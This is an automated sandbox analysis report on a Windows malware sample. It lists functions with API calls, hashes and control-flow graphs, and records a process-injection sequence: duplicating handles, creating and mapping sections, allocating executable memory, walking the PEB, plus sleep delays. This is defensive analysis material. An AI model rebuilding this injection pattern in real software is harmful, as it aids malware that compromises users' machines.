                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                        • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                                        • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                        • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                                        Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 479 4019ee-4019f6 480 4019f8-401a0b 479->480 484 401a60 480->484 485 401a06-401a48 call 4012a9 Sleep call 401524 480->485 484->480 486 401a62 484->486 491 401a57-401a6f 485->491 513 401a4a-401a52 call 401615 485->513 488 401a53 486->488 489 401a64 486->489 488->491 492 401a66-401a6b 489->492 493 401ace-401b1c call 4012a9 489->493 497 401a72-401aa7 call 4012a9 491->497 508 401a65-401a6b 491->508 492->497 521 401b21 493->521 508->497 513->488 521->521
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                        • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                                        • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                        • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                                        Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 522 4019fa-4019fc 524 4019f3 522->524 525 4019ff-401a0b 522->525 527 4019f8 524->527 529 401a60 525->529 530 401a06-401a48 call 4012a9 Sleep call 401524 525->530 527->525 529->527 531 401a62 529->531 536 401a57-401a6f 530->536 558 401a4a-401a52 call 401615 530->558 533 401a53 531->533 534 401a64 531->534 533->536 537 401a66-401a6b 534->537 538 401ace-401b1c call 4012a9 534->538 542 401a72-401aa7 call 4012a9 536->542 553 401a65-401a6b 536->553 537->542 566 401b21 538->566 553->542 558->533 566->566
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                        • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                                        • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                        • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                                        Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 567 401a09-401a48 call 4012a9 Sleep call 401524 576 401a57-401a6f 567->576 577 401a4a-401a53 call 401615 567->577 582 401a72-401aa7 call 4012a9 576->582 583 401a65-401a6b 576->583 577->576 583->582
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                        • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                                        • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                        • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                                        Function 02E31D5F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E31DB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E2B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2e2b000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: d83152b19c6260a9527c5ec3bb1d88346a26872c24ea8eee379e85f77371ff6e
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 41113C79A40208EFDB01DF98C989E98BBF5AF09351F05C094F9489B361D371EA50DF90
                                                                        Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 592 401a10-401a48 call 4012a9 Sleep call 401524 598 401a57-401a6f 592->598 599 401a4a-401a53 call 401615 592->599 604 401a72-401aa7 call 4012a9 598->604 605 401a65-401a6b 598->605 599->598 605->604
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                        • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                                        • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                        • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

                                                                        Non-executed Functions

                                                                        Function 02DE092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2de0000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction ID: f47298000e15904db90b3749a834fccbfb0aba1097fbf0ae7df6cd3cb72d5a69
                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction Fuzzy Hash: B93149B6900609DFDB10DF99C880AAEBBF9FF58325F18404AD442B7310D7B1EA45CBA4
                                                                        Function 00403406 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s
                                                                        • API String ID: 0-453955339
                                                                        • Opcode ID: 7f743d35366813b8f68f35259081feb9270aaef45d400eea41b86768d3318f38
                                                                        • Instruction ID: 9311c58cebd1cc31742e5a098034539caba4158f8a78f8a8aaedd63f8d969b04
                                                                        • Opcode Fuzzy Hash: 7f743d35366813b8f68f35259081feb9270aaef45d400eea41b86768d3318f38
                                                                        • Instruction Fuzzy Hash: 5C51C0A691D6C15FE7138F3448845E6BF289A1321970905EBC482AF2E3D73D8A07D39A
                                                                        Function 02E3197D Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E2B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2e2b000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction ID: 090cb5bf615054f1ec5f4df9fa480ee931cea92e6321d7eeaf2ad8ea06471797
                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction Fuzzy Hash: C9117C72380100AFDB44DE55DC85EA673EAEB8D325B198169E908CF312E679E802CB60
                                                                        Function 02DE0D90 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2de0000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction ID: 42c9b88feb6741f677ba5662b3752057420d93b4a1479a95134d19c9b1c7289f
                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction Fuzzy Hash: 4A018F76A106048FDF21EF24C804BAE33E5EB86716F4584B5D90BE7381E7B4AD41CB90
                                                                        Function 00402A9F Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                                        • Instruction ID: 0bf335201b4081c8990773322d5bc76c700d8f7add6b30564506a2c4c32383c8
                                                                        • Opcode Fuzzy Hash: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                                        • Instruction Fuzzy Hash: 9FB0922878D4A24AC2229B2C84921B9FF22AE57324354859181C04B282E7A848A7D204

                                                                        Execution Graph

                                                                        Execution Coverage:7.9%
                                                                        Dynamic/Decrypted Code Coverage:44.4%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:108
                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 3591 402e20 3592 402dd5 3591->3592 3594 402e24 3591->3594 3593 4019e3 15 API calls 3595 403029 3593->3595 3594->3593 3594->3595 3596 401620 3597 401626 3596->3597 3598 4016c6 NtDuplicateObject 3597->3598 3607 4017e2 3597->3607 3599 4016e3 NtCreateSection 3598->3599 3598->3607 3600 401763 NtCreateSection 3599->3600 3601 401709 NtMapViewOfSection 3599->3601 3603 40178f 3600->3603 3600->3607 3601->3600 3602 40172c NtMapViewOfSection 3601->3602 3602->3600 3604 40174a 3602->3604 3605 401799 NtMapViewOfSection 3603->3605 3603->3607 3604->3600 3606 4017c0 NtMapViewOfSection 3605->3606 3605->3607 3606->3607 3489 2d9003c 3490 2d90049 3489->3490 3502 2d90e0f SetErrorMode SetErrorMode 3490->3502 3495 2d90265 3496 2d902ce VirtualProtect 3495->3496 3498 2d9030b 3496->3498 3497 2d90439 VirtualFree 3499 2d904be LoadLibraryA 3497->3499 3498->3497 3501 2d908c7 3499->3501 3503 2d90223 3502->3503 3504 2d90d90 3503->3504 3505 2d90dad 3504->3505 3506 2d90dbb GetPEB 3505->3506 3507 2d90238 VirtualAlloc 3505->3507 3506->3507 3507->3495 3662 4019ee 3663 4019f8 3662->3663 3664 401a2b Sleep 3663->3664 3665 401524 7 API calls 3664->3665 3666 401a46 3665->3666 3667 401615 7 API calls 3666->3667 3668 401a57 3666->3668 3667->3668 3658 402f74 3660 402f7e 3658->3660 3659 4019e3 15 API calls 3661 403029 3659->3661 3660->3659 3660->3661 3632 2d90001 3633 2d90005 3632->3633 3638 2d9092b GetPEB 3633->3638 3635 2d90030 3640 2d9003c 3635->3640 3639 2d90972 3638->3639 3639->3635 3641 2d90049 3640->3641 3642 2d90e0f 2 API calls 3641->3642 3643 2d90223 3642->3643 3644 2d90d90 GetPEB 3643->3644 3645 2d90238 VirtualAlloc 3644->3645 3646 2d90265 3645->3646 3647 2d902ce VirtualProtect 3646->3647 3649 2d9030b 3647->3649 3648 2d90439 VirtualFree 3650 2d904be LoadLibraryA 3648->3650 3649->3648 3652 2d908c7 3650->3652 3508 402f9c 3510 402f8f 3508->3510 3509 403029 3510->3509 3512 4019e3 3510->3512 3513 4019f3 3512->3513 3514 401a2b Sleep 3513->3514 3519 401524 3514->3519 3516 401a46 3518 401a57 3516->3518 3531 401615 3516->3531 3518->3509 3520 401533 3519->3520 3521 4016c6 NtDuplicateObject 3520->3521 3530 4015cd 3520->3530 3522 4016e3 NtCreateSection 3521->3522 3521->3530 3523 401763 NtCreateSection 3522->3523 3524 401709 NtMapViewOfSection 3522->3524 3526 40178f 3523->3526 3523->3530 3524->3523 3525 40172c NtMapViewOfSection 3524->3525 3525->3523 3527 40174a 3525->3527 3528 401799 NtMapViewOfSection 3526->3528 3526->3530 3527->3523 3529 4017c0 NtMapViewOfSection 3528->3529 3528->3530 3529->3530 3530->3516 3532 401626 3531->3532 3533 4016c6 NtDuplicateObject 3532->3533 3542 4017e2 3532->3542 3534 4016e3 NtCreateSection 3533->3534 3533->3542 3535 401763 NtCreateSection 3534->3535 3536 401709 NtMapViewOfSection 3534->3536 3538 40178f 3535->3538 3535->3542 3536->3535 3537 40172c NtMapViewOfSection 3536->3537 3537->3535 3539 40174a 3537->3539 3540 401799 NtMapViewOfSection 3538->3540 3538->3542 3539->3535 3541 4017c0 NtMapViewOfSection 3540->3541 3540->3542 3541->3542 3542->3518 3653 2d90005 3654 2d9092b GetPEB 3653->3654 3655 2d90030 3654->3655 3656 2d9003c 7 API calls 3655->3656 3657 2d90038 3656->3657 3543 2e51398 3544 2e513a7 3543->3544 3547 2e51b38 3544->3547 3548 2e51b53 3547->3548 3549 2e51b5c CreateToolhelp32Snapshot 3548->3549 3550 2e51b78 Module32First 3548->3550 3549->3548 3549->3550 3551 2e51b87 3550->3551 3553 2e513b0 3550->3553 3554 2e517f7 3551->3554 3555 2e51822 3554->3555 3556 2e51833 VirtualAlloc 3555->3556 3557 2e5186b 3555->3557 3556->3557

                                                                        Executed Functions

                                                                        Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 99 40159d-4015a0 97->99 100 401582-401589 98->100 101 4015fd-401612 98->101 102 4015a2-4015a4 99->102 103 4015e9-4015ef 99->103 104 401560 100->104 105 40158b-40158d 100->105 107 4015a6-4015c7 102->107 108 4015f7 102->108 103->108 104->92 106 401590-401592 105->106 106->97 109 401643-401670 call 4012a9 107->109 110 4015c9 107->110 108->101 120 401672 109->120 121 401675-40167a 109->121 110->106 111 4015cb 110->111 111->99 113 4015cd 111->113 113->103 120->121 123 401680-401691 121->123 124 401991-401999 121->124 128 401697-4016c0 123->128 129 40198f 123->129 124->121 127 40199e-4019e0 call 4012a9 124->127 128->129 137 4016c6-4016dd NtDuplicateObject 128->137 129->127 137->129 138 4016e3-401707 NtCreateSection 137->138 140 401763-401789 NtCreateSection 138->140 141 401709-40172a NtMapViewOfSection 138->141 140->129 145 40178f-401793 140->145 141->140 143 40172c-401748 NtMapViewOfSection 141->143 143->140 146 40174a-401760 143->146 145->129 148 401799-4017ba NtMapViewOfSection 145->148 146->140 148->129 150 4017c0-4017dc NtMapViewOfSection 148->150 150->129 153 4017e2 call 4017e7 150->153
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                        • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                                        • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                        • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                                        Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 401615-401632 159 401643 155->159 160 401639-401670 call 4012a9 155->160 159->160 167 401672 160->167 168 401675-40167a 160->168 167->168 170 401680-401691 168->170 171 401991-401999 168->171 175 401697-4016c0 170->175 176 40198f 170->176 171->168 174 40199e-4019e0 call 4012a9 171->174 175->176 184 4016c6-4016dd NtDuplicateObject 175->184 176->174 184->176 185 4016e3-401707 NtCreateSection 184->185 187 401763-401789 NtCreateSection 185->187 188 401709-40172a NtMapViewOfSection 185->188 187->176 192 40178f-401793 187->192 188->187 190 40172c-401748 NtMapViewOfSection 188->190 190->187 193 40174a-401760 190->193 192->176 195 401799-4017ba NtMapViewOfSection 192->195 193->187 195->176 197 4017c0-4017dc NtMapViewOfSection 195->197 197->176 200 4017e2 call 4017e7 197->200
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                        • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                                        • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                        • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                                        Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 202 401635-401670 call 4012a9 210 401672 202->210 211 401675-40167a 202->211 210->211 213 401680-401691 211->213 214 401991-401999 211->214 218 401697-4016c0 213->218 219 40198f 213->219 214->211 217 40199e-4019e0 call 4012a9 214->217 218->219 227 4016c6-4016dd NtDuplicateObject 218->227 219->217 227->219 228 4016e3-401707 NtCreateSection 227->228 230 401763-401789 NtCreateSection 228->230 231 401709-40172a NtMapViewOfSection 228->231 230->219 235 40178f-401793 230->235 231->230 233 40172c-401748 NtMapViewOfSection 231->233 233->230 236 40174a-401760 233->236 235->219 238 401799-4017ba NtMapViewOfSection 235->238 236->230 238->219 240 4017c0-4017dc NtMapViewOfSection 238->240 240->219 243 4017e2 call 4017e7 240->243
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                        • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                                        • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                        • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                                        Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 245 40162d-401632 247 401643 245->247 248 401639-401670 call 4012a9 245->248 247->248 255 401672 248->255 256 401675-40167a 248->256 255->256 258 401680-401691 256->258 259 401991-401999 256->259 263 401697-4016c0 258->263 264 40198f 258->264 259->256 262 40199e-4019e0 call 4012a9 259->262 263->264 272 4016c6-4016dd NtDuplicateObject 263->272 264->262 272->264 273 4016e3-401707 NtCreateSection 272->273 275 401763-401789 NtCreateSection 273->275 276 401709-40172a NtMapViewOfSection 273->276 275->264 280 40178f-401793 275->280 276->275 278 40172c-401748 NtMapViewOfSection 276->278 278->275 281 40174a-401760 278->281 280->264 283 401799-4017ba NtMapViewOfSection 280->283 281->275 283->264 285 4017c0-4017dc NtMapViewOfSection 283->285 285->264 288 4017e2 call 4017e7 285->288
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1968288336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_jssrvvh.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                        • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                                        • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                        • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                                        Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 290 401620-401632 293 401643 290->293 294 401639-401670 call 4012a9 290->294 293->294 301 401672 294->301 302 401675-40167a 294->302 301->302 304 401680-401691 302->304 305 401991-401999 302->305 309 401697-4016c0 304->309 310 40198f 304->310 305->302 308 40199e-4019e0 call 4012a9 305->308 309->310 318 4016c6-4016dd NtDuplicateObject 309->318 310->308 318->310 319 4016e3-401707 NtCreateSection 318->319 321 401763-401789 NtCreateSection 319->321 322 401709-40172a NtMapViewOfSection 319->322 321->310 326 40178f-401793 321->326 322->321 324 40172c-401748 NtMapViewOfSection 322->324 324->321 327 40174a-401760 324->327 326->310 329 401799-4017ba NtMapViewOfSection 326->329 327->321 329->310 331 4017c0-4017dc NtMapViewOfSection 329->331 331->310 334 4017e2 call 4017e7 331->334
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
